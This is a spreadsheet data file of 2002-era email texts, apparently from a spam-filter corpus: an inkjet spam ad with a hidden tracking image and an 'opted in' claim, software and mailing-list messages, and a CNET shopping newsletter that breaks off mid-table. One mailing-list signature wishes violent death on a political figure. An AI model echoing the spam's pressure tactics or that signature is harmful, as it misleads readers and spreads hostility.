         style='font-size:13.5pt;font-family:Arial;color:white;font-weight:bold'&gt;*&lt;/span&gt;&lt;/font&gt;&lt;/b&gt;&lt;font
         size=4 color=white face=Arial&gt;&lt;span style='font-size:13.5pt;font-family:
         Arial;color:white'&gt; ACT NOW! Offer for a Limited Time Only.&lt;/span&gt;&lt;/font&gt;&lt;b&gt;&lt;font
         size=2 color=navy face=Tahoma&gt;&lt;u1:p&gt;&lt;span style='font-size:10.0pt;
         font-family:Tahoma;color:navy;font-weight:bold'&gt; &lt;/span&gt;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;&lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;td class="Normal"&gt;&lt;/u1:p&gt; 
                       &lt;/table&gt;
                     &lt;/div&gt;
                     &lt;p align=center style='text-align:center'&gt;&lt;font size=4 color=white
       face=Arial&gt;&lt;span style='font-size:13.5pt;font-family:Arial;color:white'&gt;Free 
                       Shipping on Orders over $75.00.&lt;/span&gt;&lt;/font&gt;&lt;font size=4 color=black
       face=Arial&gt;&lt;/font&gt;&lt;/p&gt;
                     &lt;p align=center style='text-align:center'&gt;&lt;font size=4 color=white
       face=Arial&gt;&lt;span style='font-size:13.5pt;font-family:Arial;color:white'&gt;Start 
                       Saving with inkjetvilla.com Now!&lt;br&gt;
                       &lt;/span&gt;&lt;/font&gt;&lt;font color=black&gt;&lt;span style='color:black'&gt;&lt;a
       href="http://click.top-special-offers.com/cgi-bin/t.pl?id=10750:60763006" target="_blank"&gt;&lt;font
       size=4 color=red face=Arial&gt;&lt;span style='font-size:13.5pt;font-family:
       Arial;color:red'&gt;click here&lt;/span&gt;&lt;/font&gt;&lt;/a&gt;&lt;/span&gt;&lt;/font&gt;&lt;/p&gt;
                     &lt;p align=center style='text-align:center'&gt;&lt;b&gt;&lt;font size=4 color=white
       face=Arial&gt;&lt;span style='font-size:13.5pt;font-family:Arial;color:white;
       font-weight:bold'&gt;Testimonials:&lt;i&gt;&lt;span style='font-style:italic'&gt; &lt;/span&gt;&lt;/i&gt;&lt;/span&gt;&lt;/font&gt;&lt;/b&gt;&lt;i&gt;&lt;font
       size=4 color=white face=Arial&gt;&lt;span style='font-size:13.5pt;font-family:
       Arial;color:white;font-style:italic'&gt;"The quality of the inkjet cartridge 
                       from Inkjetvilla.com is excellent. I wish ALL my internet 
                       purchases went this well. I received speedy service with 
                       my order.   Thank you Inkjetvilla!" Erik, 
                       &lt;/span&gt;&lt;/font&gt;&lt;/i&gt;&lt;i&gt;&lt;font
         size=4 color=white face=Arial&gt;&lt;span style='font-size:13.5pt;font-family:
         Arial;color:white;font-style:italic'&gt;West Palm Beach&lt;/span&gt;&lt;/font&gt;&lt;/i&gt;&lt;i&gt;&lt;font
        size=4 color=white face=Arial&gt;&lt;span style='font-size:13.5pt;font-family:
        Arial;color:white;font-style:italic'&gt;, &lt;/span&gt;&lt;/font&gt;&lt;/i&gt;&lt;i&gt;&lt;font
         size=4 color=white face=Arial&gt;&lt;span style='font-size:13.5pt;font-family:
         Arial;color:white;font-style:italic'&gt;FL&lt;/span&gt;&lt;/font&gt;&lt;/i&gt;&lt;font
       size=4 color=white face=Arial&gt;&lt;/font&gt;&lt;/p&gt;&lt;/td&gt;
                 &lt;/tr&gt;
               &lt;/table&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
       &lt;/div&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;IMG SRC="http://click.top-special-offers.com/cgi-bin/t.pl?id=10751:60763006&amp;o=1" BORDER=0 WIDTH=0 HEIGHT=0&gt; &lt;BR&gt;&lt;P&gt;&lt;BR&gt;&lt;!-- SKY-Email-Address: cypherpunks@einstein.ssz.com SKY-Database: top-special-offers --&gt;
 &lt;A name='unsub'&gt;&lt;TABLE align="center" border="0" cellpadding="5" cellspacing="0"&gt;&lt;TD&gt;&lt;TABLE width="600" align="center" cellpadding="0" cellspacing="0" border="0"&gt;
 &lt;tr&gt;&lt;td height=1&gt;&lt;hr noshade&gt;&lt;/td&gt;&lt;/tr&gt;&lt;TR&gt;&lt;TD align="center"&gt;&lt;FONT color="black" size="2" face="arial,sans-serif"&gt;We respect your privacy. You have opted in to receive updates on the best discount offers while visiting one of our partner sites or an
 affiliate.&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TABLE&gt;
 &lt;P&gt;&lt;!-- SKY-Email-Address: cypherpunks@einstein.ssz.com SKY-Database: top-special-offers --&gt;&lt;A name='unsub'&gt;	&lt;TABLE align="center" border="0" cellpadding="5" cellspacing="0"&gt;
 &lt;TD&gt;&lt;TABLE width="600" align="center" cellpadding="0" cellspacing="0" border="0"&gt;&lt;TR&gt;&lt;TD align="center"&gt;&lt;FONT color="black" size="2" face="arial,sans-serif"&gt;If you would no longer like to receive these offers via email, you can unsubscribe by sending a blank email to &lt;A href="mailto:unsub-60763006-1047@top-special-offers.com"&gt;unsub-60763006-1047@top-special-offers.com&lt;/A&gt;&lt;/FONT&gt;
 &lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD align="center"&gt;&lt;FONT size="2" face="arial,sans-serif"&gt;&lt;I&gt;OR&lt;/I&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;
 &lt;TD align="center"&gt;&lt;FONT face="arial,sans-serif" color="black" size="2"&gt;Sending a postal mail to CustomerService, Box 202885, Austin, TX 78720&lt;/FONT&gt;
 &lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD align="CENTER"&gt;&lt;BR&gt;&lt;FONT face="arial,sans-serif" size="2" color="black"&gt;&lt;I&gt;This message was sent to address cypherpunks@einstein.ssz.com&lt;/I&gt;&lt;/FONT&gt;
 &lt;/TD&gt;&lt;/TR&gt;&lt;tr&gt;&lt;td height=1&gt;&lt;hr noshade&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TABLE&gt;
  &lt;/body&gt;
 &lt;/html&gt;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</si>
  <si>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iSilo announcements (August 15, 2002)
</t>
  </si>
  <si>
    <t xml:space="preserve">----------------------------------------------------------------------
 1. iSilo(TM) 3.2 for Palm OS and Pocket PC enters beta1
 2. iSilo(TM) 3.2 for Windows enters beta1
 3. iSiloX 3.2 for Windows and Mac OS enters beta1
 4. iSiloXC 3.2 for Windows, Linux, FreeBSD, Mac OS X,
    and Solaris enter beta1
 ----------------------------------------------------------------------
 ======================================================================
 1. iSilo(TM) 3.2 for Palm OS and Pocket PC enters beta1
 ----------------------------------------------------------------------
 iSilo(TM) 3.2b1 adds the following new features to iSilo 3.15:
 - A System Information dialog, accessible from either the document
   list view or while viewing a document through the Tools menu.
   The dialog displays the user name (e.g., owner name) and the
   associated user ID of the device.  For Palm OS, the dialog also
   displays the free and total amount of dynamic and storage memory.
 - Support for iSiloX/iSiloXC generated password protected documents.
   The password protection is embedded into the document during
   conversion and can not be modified nor removed from the converted
   document.
 - Support for iSiloX/iSiloXC generated registration code protected
   documents. The registration code protection is embedded into the
   document during conversion.
 - Support for iSiloX/iSiloXC generated documents that include an
   expiration date. The expiration date is embedded into the document
   during conversion.
 - Support for displaying Title, Author, and Publisher information
   messages through the Document Information dialog accessible through
   the Edit menu while viewing a document.
 Please note that this is a beta version of the software, and as
 such is intended for testing purposes to help eliminate problems
 and issues before the release.
 Please report any problems or issues you encounter by sending an
 email to email@iSilo.com.  When reporting problems, please include
 all potentially relevant details, including the exact steps used
 to reproduce the problem, OS version, and hardware configuration.
 To download iSilo(TM) 3.2b1 for Palm OS(R), please go to this URL:
     &lt;http://www.iSilo.com/info/beta/iSiloPalmOS.htm&gt;
 To download iSilo 3.2b1 for Pocket PC, please go to this URL:
     &lt;http://www.iSilo.com/info/beta/iSiloPPC.htm&gt;
 ======================================================================
 2. iSilo(TM) 3.2 for Windows enters beta1
 ----------------------------------------------------------------------
 iSilo(TM) 3.2 will be the first version of iSilo for Windows
 and has the requirements shown here.
 Basic requirements:
 - Pentium or comparable processor
 - Windows 95 with Internet Explorer 4.0.1 or later, Windows 98,
   Windows Millennium, Windows NT 4.0 with Service Pack 6,
   Windows 2000, or Windows XP
 - 16MB of RAM for Windowsr 95 and Windows 98 (32MB recommended),
   32MB of RAM for Windows Millennium and Windows NT 4.0,
   64MB of RAM for Windows 2000 and Windows XP
 - 5MB of available hard-disk space for installation
 Additional functionality specific requirements:
 - Additional memory required for document storage.
 - iSiloX required for creating documents utilizing maximum document
   presentation capabilities.
 Please note that this is a beta version of the software, and as
 such is intended for testing purposes to help eliminate problems
 and issues before the release.
 Please report any problems or issues you encounter by sending an
 email to email@iSilo.com.  When reporting problems, please include
 all potentially relevant details, including the exact steps used
 to reproduce the problem, OS version, and hardware configuration.
 To download iSilo 3.2b1 for Windows, please go to this URL:
     &lt;http://www.iSilo.com/info/beta/iSiloW32.htm&gt;
 ======================================================================
 3. iSiloX 3.2 for Windows and Mac OS enters beta1
 ----------------------------------------------------------------------
 iSiloX 3.2b1 adds the following features to iSiloX 3.15:
 - In the Security properties, added support for protecting a document
   with any or all of a password, registrationn code, and expiration
   date.
 - Added a Messages property page for specifying title, author,
   publisher, password, registration code, and expiration date
   messages for the document.
 - Added cookie support and a Cookies property page for managing
   cookies.
 Please note that this is a beta version of the software, and as
 such is intended for testing purposes to help eliminate problems
 and issues before the release.
 Please report any problems or issues you encounter by sending an
 email to email@iSilo.com.  When reporting problems, please include
 all potentially relevant details, including the exact steps used
 to reproduce the problem, OS version, and hardware configuration.
 To download iSiloX 3.2b1 for Windows, please go to this URL:
     &lt;http://www.iSiloX.com/info/beta/iSiloXWindows.htm&gt;
 To download iSiloX 3.2b1 for Mac OS, please go to this URL:
     &lt;http://www.iSiloX.com/info/beta/iSiloXMac.htm&gt;
 ======================================================================
 4. iSiloXC 3.2 for Windows, Linux, FreeBSD, Mac OS X,
    and Solaris enter beta1
 ----------------------------------------------------------------------
 iSiloX 3.2b1 adds the following features to iSiloX 3.15:
 - Added &lt;Password&gt;, &lt;RegistrationCode&gt;, and &lt;Expiration&gt; container
   elements under the &lt;SecurityOptions&gt; element for protecting a
   document with any or all of a password, registration code, and
   expiration date. See .ixl file format for more information.
 - Added &lt;Messages&gt; element for specifying title, author, publisher,
   password, registration code, and expiration date messages for the
   document. See .ixl file format for more information.
 - Added cookie support and the &lt;CookieOptions&gt; element for managing
   cookies. See .ixl file format for more information.
 Please note that this is a beta version of the software, and as
 such is intended for testing purposes to help eliminate problems
 and issues before the release.
 Please report any problems or issues you encounter by sending an
 email to email@iSilo.com.  When reporting problems, please include
 all potentially relevant details, including the exact steps used
 to reproduce the problem, OS version, and hardware configuration.
 To download iSiloXC 3.2b1 for Windows, please go to this URL:
     &lt;http://www.iSiloX.com/info/beta/iSiloXCWindows.htm&gt;
 To download iSiloXC 3.2b1 for Linux, please go to this URL:
     &lt;http://www.iSiloX.com/info/beta/iSiloXC386.htm&gt;
 To download iSiloXC 3.2b1 for FreeBSD, please go to this URL:
     &lt;http://www.iSiloX.com/info/beta/iSiloXCBSD.htm&gt;
 To download iSiloXC 3.2b1 for Mac OS X, please go to this URL:
     &lt;http://www.iSiloX.com/info/beta/iSiloXCOSX.htm&gt;
 To download iSiloXC 3.2b1 for Solaris, please go to this URL:
     &lt;http://www.iSiloX.com/info/beta/iSiloXCSOL.htm&gt;
 ----------------------------------------------------------------------
 You have received this message because you subscribed to the
 iSilo(TM) mailing list.  If you would like to be removed from
 this list, please send an email with the subject "unsubscribe"
 to: &lt;list@iSilo.com&gt;.
 Please note that this email address only handles subscriptions
 and unsubscriptions of the mailing list.  Any other messages
 sent to this email address are automatically deleted.
 ----------------------------------------------------------------------
 iSilo(TM)             http://www.iSilo.com             email@iSilo.com
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 22 Jul 2002 09:42:18 +0200, "Nils O. Selsdal" &lt;noselasd@Utel.no&gt; wrote:
 &gt; Just for your information, I have an apt-repository for RH 7.3 at
 &gt; http://utelsystems.dyndns.org
 &gt; --
 &gt; NOS@Utel.no
     Your page has a typo;
 http://utelsystems.dyndns.org lists:
     rpm http://utelsystems.dyndns.org/apt redhat testingrh73
     rpm-src http://utelsystems.dyndns.org/apt redhat testing73  &lt;--
     This is why I'm so stubborn about using cut-and-paste; not only is it easy, it's typo-free.  :)
 Wouldn't it be nice if there was a way to manage these automagically?  Some central site to make them available to the rest of the world, every time there's a "apt-get update"?  :)
 ------------------------------------------------------------------------
 Brian Fahrlnder              Linux Zealot, Conservative, and Technomad
 Evansville, IN                    My Voyage: http://www.CounterMoon.com
 ICQ  5119262
 ------------------------------------------------------------------------
 I don't want to hear news from Isreal until the news contains the words
 "Bullet", "Brain", and "Arafat".
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">
 [Paul Moore]
 &gt;    but let's walk before we run - after all, we may end up
 &gt;    all using Zodb in any case :-)
 I'd like this (despite the additional installation burden - we can ship
 binaries for Windows and Mac) and not only for technical reasons.  As I
 understand it, post-1.8x versions of the core bsddb code ship under the
 Sleepycat license, which demands that projects using it must be
 published-source.  This is a problem if we want Spambayes to be fully
 PSF-licensed - if someone wants to take the Spambayes source and fund their
 addictions by creating a commercial, closed-source spam-filter product, the
 PSF license allows that but not if the code relies on bsddb.  Not that I'm
 in favour of people making money from Spambayes (unless it's me 8-) but the
 PSF license does allow for it - it should be all or nothing.  Or do I have
 this all wrong?
 Slightly OT: This has concerned me since PLabs announced that they were
 integrating bsddb into Python 2.3 - it's going to make it very easy
 (especially on Windows) for someone to write code that uses anydbm, wrap it
 up with Py2exe and ship it under a commercial license, not knowing that
 they're breaking the Sleepycat license.  They've never heard of Sleepycat
 Software or even bsddb - as far as they're concerned, this "bsddb.pyd" file
 that Py2exe tells them they need to ship is just another part of Python,
 like _socket.pyd or select.pyd.
 -- 
 Richie Hindle
 richie@entrian.com
 _______________________________________________
 Spambayes mailing list
 Spambayes@python.org
 http://mail.python.org/mailman/listinfo/spambayes
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Gecko adhesion finally sussed.
</t>
  </si>
  <si>
    <t xml:space="preserve">(Via Robot Wisdom)   Maybe you UC folk know these people?
 http://www.eurekalert.org/pub_releases/2002-08/lcc-sph082202.php
 Working at Lewis &amp; Clark College, the University of California at Berkeley, 
 the University of California at Santa Barbara, and Stanford University, 
 the interdisciplinary team:
     * confirmed speculation that the gecko's amazing climbing ability 
 depends on weak molecular attractive forces called van der Waals forces,
     * rejected a competing model based on the adhesion chemistry of water 
 molecules, and
 * discovered that the gecko's adhesive depends on geometry, not surface 
 chemistry. In other words, the size and shape of the tips of gecko foot 
 hairs--not what they are made of--determine the gecko's stickiness.
 To verify its experimental and theoretical results, the gecko group then 
 used its new data to fabricate prototype synthetic foot-hair tips from two 
 different materials.
 "Both artificial setal tips stuck as predicted," notes Autumn, assistant 
 professor of biology at Lewis &amp; Clark College in Portland, Ore. "Our 
 initial prototypes open the door to manufacturing the first biologically 
 inspired dry, adhesive microstructures, which can have widespread 
 applications." 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Great deals on the Summer's hottest MP3 players (CNET SHOPPER)
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;head&gt;
 	&lt;title&gt;Shopper Newsletter: Alerts&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#EEEEEE" alink="#0000FF" vlink="#0000FF"&gt;
 &lt;center&gt;
 &lt;A href="top"&gt;&lt;/A&gt;&lt;!-- header --&gt;
 	&lt;table border=0 cellpadding=0 cellspacing=0 width=612 bgcolor="#ffffff"&gt;
 	&lt;tr valign=top&gt;
 		&lt;td width=442 colspan=5&gt;
 			&lt;img src="http://www.cnet.com/i/sh/nl/442_shopperALERT.gif" width="442" height="60" border="0" alt="CNET Shopper Newsletter Alerts"&gt;&lt;br&gt;
 				&lt;table width=442 cellpadding=0 cellspacing=0 border=0 bgcolor="#CCCCCC"&gt;
 					&lt;tr&gt;
 						&lt;td bgcolor="#999999" colspan=1&gt;
 							&lt;img src="http://home.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;br&gt;
 						&lt;/td&gt;
 						&lt;td bgcolor="#666666" colspan=1&gt;
 							&lt;img src="http://home.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;br&gt;
 						&lt;/td&gt;
 						&lt;td bgcolor="#666666" colspan=2&gt;
 							&lt;img src="http://home.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;br&gt;
 						&lt;/td&gt;
 					&lt;/tr&gt;
 					&lt;tr&gt;
 						&lt;td bgcolor="#999999" width=1 rowspan=2&gt;
 							&lt;img src="http://home.cnet.com/b.gif" width="1" height="10" border="0"&gt;&lt;br&gt;
 						&lt;/td&gt;
 						&lt;td bgcolor="#666666" width=1 rowspan=2&gt;
 							&lt;img src="http://home.cnet.com/b.gif" width="1" height="10" border="0"&gt;&lt;br&gt;
 						&lt;/td&gt;
 						&lt;td width=9 rowspan=2&gt;
 							&lt;img src="http://home.cnet.com/b.gif" width="1" height="10" border="0"&gt;&lt;br&gt;
 						&lt;/td&gt;
 						&lt;td  width=430&gt;
 							&lt;img src="http://home.cnet.com/b.gif" width="1" height="10" border="0"&gt;&lt;br&gt;
 						&lt;/td&gt;				
 					&lt;/tr&gt;
 					&lt;tr&gt;
 						&lt;td bgcolor="#666666"&gt;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&lt;div align="center"&gt;&lt;img src="http://i.i.com.com/cnwk.1d/Ads/common/advertisement.gif" width="120" height="10" border="0"&gt;&lt;/br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=4e-0Y95InZ3aFUoY0vIKlsTn8N_JjiR" target="new"&gt;   
 &lt;img src="http://www.techrepublic.com/images/ads/Toshiba.sky.e310_399_160x600.gif" width="160" height="600" border="0"&gt;
 &lt;/a&gt;&lt;/div&gt;
 &lt;!-- /insert ad here --&gt;
 &lt;br&gt;
 &lt;!-- Most Popular --&gt;
 &lt;!-- /Most Popular --&gt;
 &lt;!-- End Vertical Brick--&gt;
 					&lt;td width=9 rowspan=2&gt;&lt;img src="http://www.cnet.com/i/nl/dd_c.gif" width=9 height=60&gt;&lt;br&gt;
 						&lt;table width=9 cellpadding=0 cellspacing=0 border=0&gt;
 							&lt;tr&gt;
 								&lt;td bgcolor="#666666"&gt;&lt;img src="http://www.cnet.com/b.gif" width=9 height=1&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td bgcolor="#CCCCCC"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=10&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td bgcolor="#666666"&gt;&lt;img src="http://www.cnet.com/b.gif" width=9 height=1&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 						&lt;/table&gt;
 					&lt;/td&gt;
 					&lt;td width=1 bgcolor="#666666" rowspan=2&gt;
 						&lt;table width=1 cellpadding=0 cellspacing=0 border=0&gt;
 							&lt;tr&gt;
 								&lt;td bgcolor="#eeeeee"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=60&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 						&lt;/table&gt;
 					&lt;/td&gt;
 				&lt;/tr&gt;
 				&lt;tr valign=top&gt;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width=410 bgcolor="#ffffff"&gt;
 						&lt;table cellpadding=0 cellspacing=0 border=0 width=430 bgcolor="#EEEEEE"&gt;
 							&lt;tr valign=top&gt;
 								&lt;td width=10&gt;&lt;/td&gt;
 &lt;!-- Date --&gt;
 								&lt;td&gt;
 									&lt;table cellpadding=0 cellspacing=0 border=0 width=400&gt;
 										&lt;tr&gt;
 											&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=6&gt;&lt;/td&gt;
 										&lt;/tr&gt;
 										&lt;tr valign=top&gt;
 											&lt;td width=10&gt;&lt;img src="http://www.cnet.com/b.gif" width=10 height=1&gt;&lt;/td&gt;
 											&lt;td align=right width=400&gt;&lt;img src="http://www.cnet.com/b.gif"&gt;&lt;br&gt;
 											&lt;font face="arial, helvetica" size="-2"&gt;July 18, 2002&lt;/font&gt;&lt;/td&gt;
 										&lt;tr valign=top&gt;
 &lt;!--C4S--&gt;									&lt;td&gt;&lt;A href="#c4s"&gt;&lt;img src="http://www.cnet.com/i/nl/arr.gif" width=10 height=12														border=0&gt;&lt;/A&gt;&lt;/td&gt;
 											&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;A href="#c4s"&gt;&lt;b&gt;From Computers4Sure.com&lt;/b&gt;&lt;/A&gt;&lt;BR&gt; iRiver's versatile SlimX just $149 &lt;/font&gt;&lt;/td&gt;
 										&lt;/tr&gt;
 										&lt;tr&gt;
 											&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=4&gt;&lt;/td&gt;
 										&lt;/tr&gt;
 &lt;!--buy--&gt;							&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=4&gt;&lt;/td&gt;
 										&lt;/tr&gt;
 										&lt;tr valign=top&gt;
 											&lt;td&gt;&lt;A href="#CDW"&gt;&lt;img src="http://www.cnet.com/i/nl/arr.gif" width=10 height=12 border=0&gt;&lt;/A&gt;&lt;/td&gt;
 											&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;A href="#CDW"&gt;&lt;b&gt;From CDW&lt;/b&gt;&lt;/A&gt; &lt;BR&gt;Apple's groundbreaking iPod just $399&lt;/font&gt;&lt;/td&gt;
 										&lt;/tr&gt;
 										&lt;tr&gt;
 											&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=6&gt;&lt;/td&gt;
 										&lt;/tr&gt;
 								&lt;/table&gt;
 								&lt;table cellpadding=0 cellspacing=0 border=0 width=410&gt;
 									&lt;tr&gt;
 										&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=8&gt;&lt;/td&gt;
 									&lt;/tr&gt;
 								&lt;/table&gt;
 							&lt;/td&gt;
 						&lt;/tr&gt;
 					&lt;/table&gt;
 					&lt;table cellpadding=0 cellspacing=0 border=0 width=430&gt;
 						&lt;tr&gt;
 							&lt;td bgcolor="#999999"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;
 						&lt;/tr&gt;
 					&lt;/table&gt;
 &lt;br&gt;
 &lt;div style="MARGIN-LEFT: 10px; MARGIN-RIGHT: 10px"&gt;
 &lt;!-- C4S TEMPLATE --&gt;
 &lt;a name="c4s"&gt;
 					&lt;table cellpadding="0" cellspacing="0" border=0 width="410"&gt;
 						&lt;TBODY&gt;
 							&lt;tr&gt;
 								&lt;td valign=bottom&gt;&lt;font face="arial, helvetica" size="3"&gt;&lt;b&gt;Computers4Sure&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 								&lt;td&gt;
 									&lt;P align=right&gt;	
 										&lt;img style="border: #CCCCCC solid 1px;" src="http://shopper.cnet.com/Images/Resellers/Premier/235579.gif""&gt;&lt;/P&gt;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 Product 1 --&gt;
 							&lt;tr valign="top"&gt;
 								&lt;td width="120"&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=64-UBOhIuLecuWMdWyNGWF8w6YrPhnR" &gt;&lt;img style="border: #CCCCCC solid 1px;" src="http://shopper.cnet.com/i/ce/ps/120/8591280_120_1.gif"&gt;&lt;/a&gt;&lt;/td&gt;
 								&lt;td width="10"&gt;&lt;img src="http://www.cnet.com/b.gif" width=10 height=1&gt;&lt;/td&gt;
 								&lt;td width=270 colspan="2"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=79-rsQHIEBe5mGccyfmFz_e0CvgparR" &gt;&lt;B&gt;iRiver SlimX iMP-350&lt;/b&gt;&lt;/a&gt; &lt;BR&gt;
 								&amp;#149; Ultra-slim, 16.7mm in width&lt;BR&gt;
 								&amp;#149; Supports MP3/WMA/ASF/CD formats&lt;BR&gt;
 								&amp;#149; Rechargeable batteries included&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$149&lt;/font&gt;&lt;/B&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td width="400" colspan="4"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=12&gt;&lt;/td&gt;
 							&lt;/tr&gt;						
 &lt;!-- Product 2 --&gt;
 							&lt;tr valign=top&gt;
 								&lt;td width=120&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=8e-Ve-cQCnqnXT-diaPDuYWD0V_WyRR" &gt;&lt;img style="border: #CCCCCC solid 1px;" src="http://shopper.cnet.com/i/ce/ps/120/8530672_120_1.gif"&gt;&lt;/a&gt;&lt;/td&gt;
 								&lt;td width="10"&gt;&lt;img src="http://www.cnet.com/b.gif" width=10 height=1&gt;&lt;/td&gt;
 								&lt;td width=270 colspan="2"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=a3-qXf6QYU2RSEhSe8fQffN5r5ls4FR" &gt;&lt;B&gt;Sonicblue Rio Riot&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; Stores over 400 complete albums &lt;BR&gt;
 								&amp;#149; Built-in FM tuner/custom presets&lt;BR&gt;
 								&amp;#149; Extra-large, backlit LCD &lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$300&lt;/font&gt;&lt;/B&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td width="400" colspan="4"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=12&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 &lt;!-- Product 3 --&gt;
 							&lt;tr valign=top&gt;
 									&lt;td width=120&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=b8-smr2QQUsXVklH5Dlq9S_p8qkEi9R" &gt;&lt;img style="border: #CCCCCC solid 1px;" src="http://shopper.cnet.com/i/ce/ps/120/5603188_120_1.gif" width=120 height=90&gt;&lt;/a&gt;&lt;/td&gt;
 								&lt;td width="10"&gt;&lt;img src="http://www.cnet.com/b.gif" width=10 height=1&gt;&lt;/td&gt;
 								&lt;td width=270 colspan="2"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=ce-Sd0CQMsHsEpBkSn3ufz1Jey2fPRR" &gt;&lt;B&gt;TDK Mojo CD-MP3&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; Play up to 10 hours of music&lt;BR&gt;
 								&amp;#149; 8-minute MP3 skip protection&lt;BR&gt;
 								&amp;#149; Supports MP3, Audio CD&lt;BR&gt;
 							    &amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$125&lt;/font&gt;&lt;/B&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td width="400" colspan="4"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=12&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;!-- Product 4 --&gt;
 							&lt;tr valign=top&gt;
 								&lt;td width=120&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=e3-ze2WQkVDQ-1FbL2-JM2mPpt29eFR" &gt;&lt;img style="border: #CCCCCC solid 1px;" src="http://shopper.cnet.com/i/ce/ps/120/2522367_120_1.gif"&gt;&lt;/a&gt;&lt;/td&gt;
 								&lt;td width="10"&gt;&lt;img src="http://www.cnet.com/b.gif" width=10 height=1&gt;&lt;/td&gt;
 								&lt;td width=270 colspan="2"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=f8-57BSQfscKTc7TWDpiaRL6DCwol9R" &gt;&lt;B&gt;Sonicblue Rio 600 (32MB)&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; Customize your music!&lt;BR&gt;
 								&amp;#149; 32MB, supports MP3 and WMA&lt;BR&gt;
 								&amp;#149; USB, PC/Mac compatible&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$97&lt;/font&gt;&lt;/B&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td width="400" colspan="4"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=12&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 						&lt;/table&gt;	
 		&lt;p&gt;	&lt;BR CLEAR=ALL&gt;	
 &lt;!-- center ad --&gt;
 &lt;P&gt;
 &lt;P&gt;
 &lt;!-- /center ad --&gt;
 &lt;!-- CDW TEMPLATE --&gt;
 &lt;a name="CDW"&gt;
 					&lt;table cellpadding="0" cellspacing="0" border=0 width="410"&gt;
 						&lt;TBODY&gt;
 							&lt;tr&gt;
 								&lt;td valign=bottom&gt;&lt;font face="arial, helvetica" size="3"&gt;&lt;b&gt;CDW&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 								&lt;td&gt;
 									&lt;P align=right&gt;	
 										&lt;img style="border: #CCCCCC solid 1px;" src="http://shopper.cnet.com/Images/Resellers/Premier/235003.gif""&gt;&lt;/P&gt;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 Product 1 --&gt;
 							&lt;tr valign="top"&gt;
 								&lt;td width="120"&gt;
